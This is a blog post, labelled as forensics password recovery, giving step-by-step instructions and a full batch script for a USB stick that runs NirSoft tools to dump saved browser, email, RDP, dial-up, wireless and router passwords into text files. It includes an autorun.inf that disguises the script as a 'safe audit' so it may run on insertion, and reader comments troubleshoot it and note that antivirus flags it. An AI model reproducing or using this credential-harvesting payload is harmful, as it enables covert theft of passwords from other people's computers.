forensics – password recovery gerasimos style

idea came from gerasimos respect as always

http://securityhorror.blogspot.se/2012/04/trojana-zing-usb-sticks.html

windows xp

1. open notepad copy the bellow starting from start.

start ChromePass.exe /stext \Info\ChromePass.txt
start Dialupass.exe /stext \Info\Dialupass.txt
start iepv.exe /stext \Info\iepv.txt
start mspass.exe /stext \Info\mspass.txt
start netpass.exe /stext \Info\netpass.txt
start OperaPassView.exe /stext \Info\OperaPassView.txt
start PasswordFox.exe /stext \Info\PasswordFox.txt
start rdpv.exe /stext \Info\rdpv.txt
start WirelessKeyView.exe /stext \Info\WirelessKeyView.txt
start IECacheView.exe /stext \Info\IECacheView.txt
start mailpv.exe /stext \Info\mailpv.txt
start RouterPassView.exe /stext \Info\RouterPassView.txt
start empv.exe /stext \Info\empv.txt
start iehv.exe /stext \Info\iehv.txt
start MozillaHistoryView.exe /stext \Info\MozillaHistoryView.txt
start WebBrowserPassView.exe /stext \Info\WebBrowserPassView.txt

2. save as

filename:   launch.bat

Save as type:   All Files

Save

3. place file into a blank usb stick

4. go to www.nirsoft.net/utils download all the .exe files you listed above.

5. unzip the files and save the .exe’s to the same usb with the launch.bat file on it.

6. create a new folder inside of the usb stick call it Info.

8. double click the launch.bat and then open Info folder you should see .txt files open and read!

Optional not required but attempt to make it auto run

1. create an autorun file called autorun.inf Create new notepad copy the below in

[autorun]

open=launch.bat

Action = safe audit

2. save as autorun.inf

3. then when you place usb in it should pop up with option to run safe audit or if option may just run!

MyExploitHQ

2 thoughts on “forensics – password recovery gerasimos style

  1. It could be that I’m doing something wrong, but I followed all the steps (al but of the autorun thing since it doesn’t work with USB drives at Win 7). So instead of creating a txt file, the program (WebBrowserPassView e.g.) opens and stays open. After closing, the only thing that is new in my USB Drive dirctory is a .cfg file from WebBrowserPassView.
    Looks like the /stext function isn’t handed over to the program

    Is there a new way to do it or am I just doing something wrong?

    1. Oh this was tested years ago on Windows XP machine which I suspect logged in with an account with system rights, right click run the .bat file as admin, also this will trigger AV as nirsoft apps are listed under AV signatures. It was originally just made to see if it could be done.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s